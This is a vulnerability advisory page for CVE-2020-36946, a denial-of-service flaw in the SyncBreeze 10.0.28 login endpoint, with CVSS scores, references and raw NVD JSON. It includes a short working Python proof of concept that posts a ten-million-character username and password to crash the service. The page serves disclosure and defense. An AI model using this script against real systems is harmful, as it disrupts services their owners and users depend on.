CVE-2020-36946

Description

SyncBreeze 10.0.28 contains a denial of service vulnerability in the login endpoint that allows remote attackers to crash the service. Attackers can send an oversized payload in the login request to overwhelm the application and potentially disrupt service availability.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:flexense:syncbreeze:10.0.28:*:*:*:enterprise:*:*:* - VULNERABLE

SyncBreeze 10.0.28

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target = 'http://target:8090/api/login'
payload = 'A' * 10000000

data = {
    'username': payload,
    'password': payload
}

response = requests.post(target, json=data)
print(response.status_code)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36946
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36946
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36946/
[4] VulDB https://vuldb.com/cve/CVE-2020-36946
[5] http://www.syncbreeze.com
[6] https://www.exploit-db.com/exploits/49291
[7] https://www.vulncheck.com/advisories/syncbreeze-login-denial-of-service
[8] https://www.exploit-db.com/exploits/49291

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36946", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:11.857", "lastModified": "2026-03-24T21:24:00.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SyncBreeze 10.0.28 contains a denial of service vulnerability in the login endpoint that allows remote attackers to crash the service. Attackers can send an oversized payload in the login request to overwhelm the application and potentially disrupt service availability."}, {"lang": "es", "value": "SyncBreeze 10.0.28 contiene una vulnerabilidad de denegación de servicio en el endpoint de inicio de sesión que permite a atacantes remotos colapsar el servicio. Los atacantes pueden enviar una carga útil sobredimensionada en la solicitud de inicio de sesión para sobrecargar la aplicación y potencialmente interrumpir la disponibilidad del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flexense:syncbreeze:10.0.28:*:*:*:enterprise:*:*:*", "matchCriteriaId": "080D2272-4C32-4EC4-93C5-B634F0F2D364"}]}]}], "references": [{"url": "http://www.syncbreeze.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/49291", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/syncbreeze-login-denial-of-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/49291", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}